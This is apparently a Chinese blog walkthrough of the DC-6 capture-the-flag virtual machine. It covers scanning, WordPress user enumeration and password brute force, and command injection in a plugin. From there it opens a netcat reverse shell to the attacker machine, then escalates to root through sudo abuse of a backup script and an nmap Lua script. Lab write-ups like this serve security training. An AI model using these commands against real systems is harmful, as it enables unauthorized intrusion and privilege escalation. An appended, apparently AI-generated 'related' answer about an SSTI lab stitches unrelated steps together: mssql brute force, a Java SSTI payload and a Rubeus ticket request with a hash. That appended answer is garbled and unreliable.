【DC6靶场通关详细记录】

环境搭建

  1. DC6靶场官网下载,点击下载DC6靶场https://www.five86.com/downloads/DC-6.zip
  2. 直接虚拟机导入DC6靶场即可,如果报错直接点击重试;
  3. 设置kali于DC6靶场的网络连接为统一方式;
  4. 同时说明一下DC6靶场,只有一个flag。

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -sC -p- -A 192.168.223.134

image.png
尝试访问后,访问不到web页面,url地址转换到http://wordy/
将IP和网址加入host文件进行解析,host文件写入以下语句

192.168.223.134 wordy

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

whatweb -v 192.168.223.134

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.134
dirsearch需要安装
apt-get install dirsearch

image.png

密码破解

使用工具wpscan

  1. 由信息收集的内容,网站使用wordpress搭建
  2. 使用专门的对wordpress进行扫描的工具wpsacn进行扫描

用户枚举

  1. 使用wpscan进行网站用户枚举,使用以下命令

wpscan --url http://wordy/ --enumerate u

image.png

  1. 将用户名保存在文件中,接下来爆破密码会使用

密码破解

  1. 获取密码字典,根据以下提示获取密码字典,官方提示使用以下命令获取字典
  1. cat /usr/share/wordlists/rockyou.txt | grep k01 >/root/pass.txt
  1. 使用wpscan进行网站密码爆破,使用以下命令

wpscan --url http://wordy/ -P pass.txt -U user

image.png
获得有效用户名和密码

mark : helpdesk01

获取shell

网站页面查找漏洞

  1. 通过爆破出来的用户名密码登陆网站

  2. 在网站插件处找到可能存在漏洞利用的点,具体位置如下图
    image.png

  3. 此处功能点可以执行命令,尝试执行命令有回显
    image.png

获取webshell

  1. 利用此处命令执行漏洞,尝试执行反弹shell

kali开启监听: nc -lvp 8888
网站命令执行:nc 192.168.223.129 8888 -e /bin/bash
点击按钮后获得webshell

另一种获得shell的方法

  1. 根据网站页面内容Activity monitor,尝试搜索漏洞
    image.png

  2. 尝试kali搜索漏洞

searchsploit activity
searchsploit -m 50110.py

image.png

  1. 利用脚本获取shell(不稳定),推荐使用使用nc获取shell
    image.png

尝试提权

  1. 尝试sudo提权,无法提权

sudo -l

  1. 尝试suid提权,无法提权

find / -perm -u=s -type f 2>/dev/null

image.png

  1. 尝试计划任务提权,无法提权

cat /etc/crontab

提权

尝试登录ssh

  1. 查看目录、文件,在文件中查看到一个文件提示新增加一个用户,后面的内容应该是用户名密码
    image.png

  2. 通过获得的新用户名密码,尝试登陆ssh
    image.png

ssh尝试提权

  1. 尝试sudo提权,有一个其他用户权限的文件

sudo -l

image.png

  1. 尝试文件中写入/bin/bash,并执行该文件,获取另一用户的权限
  1. echo ‘/bin/bash’ >> backups.sh
  2. sudo -u jens /home/jens/backups.sh

image.png

nmap提权

  1. 在获取到的新用户shell下,尝试sudo提权

sudo -l

image.png

  1. 查找nmap提权方法

image.png

  1. 通过提权,获得root权限

TF=$(mktemp)
echo ‘os.execute(“/bin/sh”)’ > $TF

sudo nmap --script=$TF

image.png
没有命令回显,需要输入命令回车后才显示命令,同时使用python开启交互终端,命令如下

python -c ‘import pty;pty.spawn(“/bin/bash”)’

flag

  1. 使用python开启交互式的终端后,查看权限和flag(此处无截图 😂又忘截图了下次一定)

whoami
ls
cat theflag.txt

总结

  1. wordpress建站系统在kali中有专门的扫描器wpscan
  2. 命令执行漏洞利用方法:直接反弹shell
  3. 当一个webshell中无法提权时,尝试更换shell或ssh获取其他用户的shell进行提权操作
  4. sudo的nmap提权操作
TF=$(mktemp)
echo 'os.execute("/bin/sh")'  > $TF
sudo nmap   --script=$TF
  • 21
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值